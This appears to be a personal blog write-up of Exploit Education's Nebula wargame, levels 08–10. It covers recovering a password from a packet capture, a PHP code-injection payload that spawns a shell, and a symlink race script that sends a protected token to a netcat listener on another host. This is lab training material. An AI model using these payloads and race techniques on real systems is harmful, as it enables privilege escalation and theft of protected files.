blog.smigiel.dev

Sep 07, 2020

Exploit Education - Nebula Part 3

Level 08

Solution

This sounds easy enough. Just go to flag08 directory and see what kind of files are there. At first, I felt intimidated by root:root access to capture.pcap file. However, it occured that the file allows to be read by anyone. In that case, we might be able to copy it and retrieve necessary information.

Result

After downloading capture.pcap I was able to open it with wireshark, where I've seen some tcp traffic. By selecting Follow TCP I've noticed that this is dump of someone's login attempts.

..wwwbugs login: l.le.ev.ve.el.l8.8
..
Password: backdoor...00Rm8.ate
.
..
Login incorrect
wwwbugs login:

However, hex dump shows some more details

000000B9  62                                                 b
000000BA  61                                                 a
000000BB  63                                                 c
000000BC  6b                                                 k
000000BD  64                                                 d
000000BE  6f                                                 o
000000BF  6f                                                 o
000000C0  72                                                 r
000000C1  7f                                                 .
000000C2  7f                                                 .
000000C3  7f                                                 .
000000C4  30                                                 0
000000C5  30                                                 0
000000C6  52                                                 R
000000C7  6d                                                 m
000000C8  38                                                 8
000000C9  7f                                                 .
000000CA  61                                                 a
000000CB  74                                                 t
000000CC  65                                                 e
000000CD  0d                                                 .

One can notice, that x7f equals to backspace. It probably means, that user pressed wrong key, and removed it. After decyphering it, it seems to be backd00Rmate.

➜  ~ ssh flag08@nebula
flag08@nebula:~$ ls
capture.pcap
flag08@nebula:~$ getflag
You have successfully executed getflag on a target account
flag08@nebula:~$

Level 09

I couldn't crack this one, so I searched for solution over the internet. This one is explaining it very good: Lucian Nitescu. Unfortunately, my php knowledge is not the best.

Solution

We need to use both $filename and $use_me variables. First one needs to contain payload, second will contain program name.

Result

level09@nebula:~$ cat exploit.php
[email {${system(sh)}}]
level09@nebula:~$ ~flag09/flag09 exploit.php .
PHP Notice:  Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1
sh-4.2$ whoami
flag09
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$

Interesting that, when I replaced sh with bash it is not working:

PHP Notice:  Use of undefined constant bash - assumed 'bash' in /home/flag09/flag09.php(15) : regexp code on line 1
bash-4.2$ whoami
level09
bash-4.2$ getflag
getflag is executing on a non-flag account, this doesn't count

One can always provide $use_me variable too.

level09@nebula:~$ cat exploit.php
[email {${system($use_me)}}]
level09@nebula:~$ ~flag09/flag09 exploit.php getflag
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:~$ ~flag09/flag09 exploit.php sh
sh-4.2$ whoami
flag09

Level 10

TOCTOU == Time of Check, Time of Use

This is another one, where I spent significant amount of time. Even if I know how it suppose to work, I haven't been able to implement the solution correctly.

Solution

Time of Check, Time of Use means, that when program is running, it needs to verify an access to file, where we have an access. However, after doing that, we need to swap this file, with another one, which is unavailable to us.

Result

Nebula instance:

level10@nebula:~$ touch my_file
level10@nebula:~$ while true; do ln -sf /home/flag10/token token; ln -sf my_file token; done &
[1] 4467
level10@nebula:~$ while true; do /home/flag10/flag10 token debian; done
You don't have access to token
You don't have access to token
Connecting to debian:18211 .. Connected!
Sending file .. wrote file!
Connecting to debian:18211 .. Unable to connect to host debian

Second instance

dasm@debian:~$ nc -klp 18211 > received
dasm@debian:~$ cat received
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27

Nebula instance

level10@nebula:~$ su flag10
Password:  # use found token
sh-4.2$ getflag
You have successfully executed getflag on a target account